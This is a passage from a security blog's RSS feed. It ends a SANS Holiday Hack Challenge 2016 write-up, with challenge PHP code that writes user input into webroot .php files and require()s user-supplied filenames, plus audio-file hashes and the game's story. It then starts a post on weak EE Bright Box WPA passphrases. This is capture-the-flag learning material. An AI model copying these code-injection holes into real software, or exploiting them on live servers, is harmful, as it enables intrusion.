&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-php&quot; data-lang=&quot;php&quot;&gt;&lt;span class=&quot;cp&quot;&gt;&amp;lt;?php&lt;/span&gt; 

&lt;span class=&quot;c1&quot;&gt;## Audio file from Discombobulator in webroot: discombobulated-audio-6-XyzE3N9YqKNH.mp3&lt;/span&gt;

&lt;span class=&quot;c1&quot;&gt;## Code from http://thisinterestsme.com/receiving-json-post-data-via-php/&lt;/span&gt;
&lt;span class=&quot;c1&quot;&gt;## Make sure that it is a POST request.&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;strcasecmp&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$_SERVER&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'REQUEST_METHOD'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;],&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;'POST'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;){&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;die&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;Request method must be POST&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
	 
&lt;span class=&quot;c1&quot;&gt;## Make sure that the content type of the POST request has been set to application/json&lt;/span&gt;
&lt;span class=&quot;nv&quot;&gt;$contentType&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;isset&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$_SERVER&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;CONTENT_TYPE&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;])&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;?&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;trim&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$_SERVER&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;CONTENT_TYPE&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;])&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;''&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;strcasecmp&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$contentType&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;'application/json'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;){&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;die&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;Content type must be: application/json&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
	
&lt;span class=&quot;c1&quot;&gt;## Grab the raw POST. Necessary for JSON in particular.&lt;/span&gt;
&lt;span class=&quot;nv&quot;&gt;$content&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;file_get_contents&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;php://input&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
&lt;span class=&quot;nv&quot;&gt;$obj&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;json_decode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$content&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;kc&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
	&lt;span class=&quot;c1&quot;&gt;# If json_decode failed, the JSON is invalid.&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;is_array&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$obj&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)){&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;die&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;POST contains invalid JSON!&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;c1&quot;&gt;## Process the JSON.&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;!&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;isset&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$obj&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'operation'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;])&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;or&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
	&lt;span class=&quot;nv&quot;&gt;$obj&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'operation'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;!==&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;WriteCrashDump&quot;&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;and&lt;/span&gt;
	&lt;span class=&quot;nv&quot;&gt;$obj&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'operation'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;!==&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;ReadCrashDump&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;
	&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;k&quot;&gt;die&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump.&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;isset&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$obj&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'data'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]))&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$obj&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'operation'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;WriteCrashDump&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;c1&quot;&gt;# Write a new crash dump to disk&lt;/span&gt;
		&lt;span class=&quot;nf&quot;&gt;processCrashDump&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$obj&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'data'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]);&lt;/span&gt;
	&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
	&lt;span class=&quot;k&quot;&gt;elseif&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$obj&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'operation'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;ReadCrashDump&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;c1&quot;&gt;# Read a crash dump back from disk&lt;/span&gt;
		&lt;span class=&quot;nf&quot;&gt;readCrashdump&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$obj&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'data'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]);&lt;/span&gt;
	&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;c1&quot;&gt;# data key unset&lt;/span&gt;
	&lt;span class=&quot;k&quot;&gt;die&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;Fatal error! JSON key 'data' must be set.&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;processCrashdump&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$crashdump&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;nv&quot;&gt;$basepath&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;/var/www/html/docs/&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
	&lt;span class=&quot;nv&quot;&gt;$outputfilename&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;tempnam&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$basepath&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;crashdump-&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
	&lt;span class=&quot;nb&quot;&gt;unlink&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$outputfilename&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
	
	&lt;span class=&quot;nv&quot;&gt;$outputfilename&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$outputfilename&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;.php&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
	&lt;span class=&quot;nv&quot;&gt;$basename&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;basename&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$outputfilename&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
	
	&lt;span class=&quot;nv&quot;&gt;$crashdump_encoded&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;&amp;lt;?php print('&quot;&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;json_encode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$crashdump&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;JSON_PRETTY_PRINT&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;');&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
	&lt;span class=&quot;nb&quot;&gt;file_put_contents&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$outputfilename&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$crashdump_encoded&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
			
	&lt;span class=&quot;k&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;sh&quot;&gt;&amp;lt;&amp;lt;&amp;lt;END
{
	&quot;success&quot; : true,
	&quot;folder&quot; : &quot;docs&quot;,
	&quot;crashdump&quot; : &quot;$basename&quot;
}

END;&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;readCrashdump&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$requestedCrashdump&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;nv&quot;&gt;$basepath&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;/var/www/html/docs/&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
	&lt;span class=&quot;nb&quot;&gt;chdir&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$basepath&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;		
	
	&lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;!&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;isset&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$requestedCrashdump&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'crashdump'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]))&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;k&quot;&gt;die&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;Fatal error! JSON key 'crashdump' must be set.&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
	&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;substr&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;strrchr&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$requestedCrashdump&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'crashdump'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;],&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;.&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;),&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;php&quot;&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;k&quot;&gt;die&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;Fatal error! crashdump value duplicate '.php' extension detected.&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
	&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
	&lt;span class=&quot;k&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;k&quot;&gt;require&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$requestedCrashdump&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'crashdump'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;'.php'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
	&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;	
&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;cp&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;At the top of the source, we see a handy code comment which reveals the location of the audio file, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;http://ex.northpolewonderland.com/discombobulated-audio-6-XyzE3N9YqKNH.mp3&lt;/code&gt; which we can download using a standard &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;GET&lt;/code&gt; request (MD5 sum &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;4ee86b5b0eef9f8815ee7446272a6c06&lt;/code&gt;).&lt;/p&gt;

&lt;h3 id=&quot;summary&quot;&gt;Summary&lt;/h3&gt;
&lt;p&gt;In total, between the six exploits explored above and the APK embedded resources, we have seven audio files:&lt;/p&gt;

&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th style=&quot;text-align: left&quot;&gt;filename&lt;/th&gt;
      &lt;th style=&quot;text-align: left&quot;&gt;md5sum&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;discombobulatedaudio1.mp3&lt;/code&gt;&lt;/td&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;b7aca2f218c39b997bfd61b83856aed2&lt;/code&gt;&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;discombobulatedaudio2.mp3&lt;/code&gt;&lt;/td&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;f05c1ec6c536e455ec686973fa6b8e20&lt;/code&gt;&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;discombobulatedaudio3.mp3&lt;/code&gt;&lt;/td&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;0be15d00299af1a6bc1d11ab6f2696a0&lt;/code&gt;&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;debug-20161224235959-0.mp3&lt;/code&gt;&lt;/td&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;0a5ef5d7a0e89658a833d1892a9e1ec6&lt;/code&gt;&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;discombobulatedaudio5.mp3&lt;/code&gt;&lt;/td&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;3d87c1d31717f81f1966db4133f9e24d&lt;/code&gt;&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;discombobulated-audio-6-XyzE3N9YqKNH.mp3&lt;/code&gt;&lt;/td&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;4ee86b5b0eef9f8815ee7446272a6c06&lt;/code&gt;&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;discombobulatedaudio7.mp3&lt;/code&gt;&lt;/td&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;313e7e370fd7d5232bb569f21856d9f4&lt;/code&gt;&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;See part 5 for their analysis, and to find out who the perpetrator was!&lt;/p&gt;

&lt;h2 id=&quot;part-5-discombobulated-audio&quot;&gt;Part 5: Discombobulated Audio&lt;/h2&gt;

&lt;p&gt;Now that we have all of the discombobulated audio files, it’s time to figure out what they mean. From listening to some of the files, it sounds like there might be some slowed-down speech, so by speeding up the tracks with trial and error using &lt;a href=&quot;http://www.audacityteam.org/&quot;&gt;Audacity&lt;/a&gt;, and putting them in order of their filenames (with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;debug-…0.mp3&lt;/code&gt; slotting in between files 3 and 5), we end up with a coherent, and familiar, sentence:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&quot;Father Christmas, Santa Claus. Or, as I've always known him, Jeff.&quot;
                 ~ The Doctor
                   Doctor Who, A Christmas Carol (2010)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;This turns out to be the passphrase for the final door (the one lacking a terminal) in “The Corridor” area of the quest world, and allows us access to The Clock Tower in both the present day and in 1978. Climbing The Clock Tower in the present day, we find none other than the Doctor himself, who admits to kidnapping Santa!&lt;/p&gt;

&lt;p&gt;The Doctor explains his reasoning in his epilogue; he wished to take Santa back to 1978 and use his magick to prevent the release of the Star Wars Holiday Special.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&amp;lt;Dr. Who&amp;gt; - The question of the hour is this: Who nabbed Santa.
&amp;lt;Dr. Who&amp;gt; - The answer? Yes, I did.
&amp;lt;Dr. Who&amp;gt; - Next question: Why would anyone in his right mind kidnap Santa Claus?
&amp;lt;Dr. Who&amp;gt; - The answer: Do I look like I'm in my right mind? I'm a madman with a box.
&amp;lt;Dr. Who&amp;gt; - I have looked into the time vortex and I have seen a universe in which the Star Wars Holiday Special was NEVER released. 
            In that universe, 1978 came and went as normal. No one had to endure the misery of watching that abominable blight. 
            People were happy there. It's a better life, I tell you, a better world than the scarred one we endure here.
&amp;lt;Dr. Who&amp;gt; - Give me a world like that. Just once.
&amp;lt;Dr. Who&amp;gt; - So I did what I had to do. 
            I knew that Santa's powerful North Pole Wonderland Magick could prevent the Star Wars Special from being released, 
            if I could leverage that magick with my own abilities back in 1978. 
            But Jeff refused to come with me, insisting on the mad idea that it is better to maintain the integrity of the universe’s timeline. 
            So I had no choice – I had to kidnap him.
&amp;lt;Dr. Who&amp;gt; - It was sort of one of those days.
&amp;lt;Dr. Who&amp;gt; - Well. You know what I mean.
&amp;lt;Dr. Who&amp;gt; - Anyway... Since you interfered with my plan, we'll have to live with the Star Wars Holiday Special in this universe... FOREVER.
            If we attempt to go back again, to cross our own timeline, we'll cause a temporal paradox, a wound in time.
&amp;lt;Dr. Who&amp;gt; - We'll never be rid of it now. The Star Wars Holiday Special will plague this world until time itself ends... 
            All because you foiled my brilliant plan
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
</description>
        <pubDate>Thu, 05 Jan 2017 00:00:00 +0000</pubDate>
        <link>/post/sans-holiday-hack-challenge-2016/</link>
        <guid isPermaLink="true">/post/sans-holiday-hack-challenge-2016/</guid>
        
        
      </item>
    
      <item>
        <title>EE Bright Box default WPA passphrases are not secure</title>
        <description>&lt;h2 id=&quot;background&quot;&gt;Background&lt;/h2&gt;

&lt;p&gt;The security of consumer wireless routers has come a long way over the years.&lt;/p&gt;

&lt;p&gt;In terms of the technology available, we’ve gone from completely unprotected wireless networks being the norm, seen the rise and fall of the fundamentally broken WEP algorithm, and arrived at the relative security of WPA/WPA2.&lt;/p&gt;

&lt;p&gt;A wireless network protected by WPA/WPA2 using a pre-shared key (which is what you’d encounter in typical home setups), however, is only as secure as the key itself: capturing the handshake between a wireless device and the wireless router is all that is needed to perform an offline brute-force attack and recover a weak passphrase, so the passphrase needs to be strong.&lt;/p&gt;

&lt;!--more--&gt;

